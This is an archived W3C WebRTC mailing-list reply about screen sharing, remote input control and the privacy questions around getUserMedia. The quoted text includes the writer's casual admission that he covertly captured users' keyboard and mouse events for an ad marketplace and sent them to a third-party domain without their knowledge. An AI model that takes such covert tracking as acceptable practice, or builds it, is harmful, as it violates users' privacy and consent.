W3C home > Mailing lists > Public > public-webrtc@w3.org > November 2013

Re: Screen sharing and application control

From: <piranna@gmail.com>
Date: Tue, 26 Nov 2013 00:09:29 +0100
Message-ID: <CAKfGGh3_Fa+L0XV3ysdD2bnHkmniRVkQd=YK5qpadn08cLVnJQ@mail.gmail.com>
To: Martin Thomson <martin.thomson@gmail.com>
Cc: public-webrtc <public-webrtc@w3.org>
Thanks for the clarification :-)

So, here the key is the point that's the local app the one that's
explicitly fetching the event and sending it remotely, instead of being
fetch automatically for example with WebRTC and a "requestRemoteKeyboard",
isn't it? Currently there are some tricks to be able to do snapshots of the
full screen and you can send them remotely, so what's the diference with
being done automatically with getUserMedia()? The fact that are a sequence
of frames instead of a stream?

I agree there's a privacy concern here that needs to be fixed, but moving
the dust under the carpet of a plugin is not the solution.

Send from my Samsung Galaxy Note II
El 25/11/2013 23:36, "Martin Thomson" <martin.thomson@gmail.com> escribió:

> On 25 November 2013 14:34, piranna@gmail.com <piranna@gmail.com> wrote:
> > You can already capture and generate both keyboard and mouse events since
> > almost the begining of the web and Javascript, and in fact I did it for
> an
> > online ad marketplace where I worked where I sended the data to a third
> > party domain without user being aware of nothing. Or are you talking
> about
> > something different that I've missed?
> Those events are only captured and generated within the context of the
> window that the application already controls.  Remote control of the
> sort I was referring to goes outside of that context.
Received on Monday, 25 November 2013 23:09:56 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 19:17:52 UTC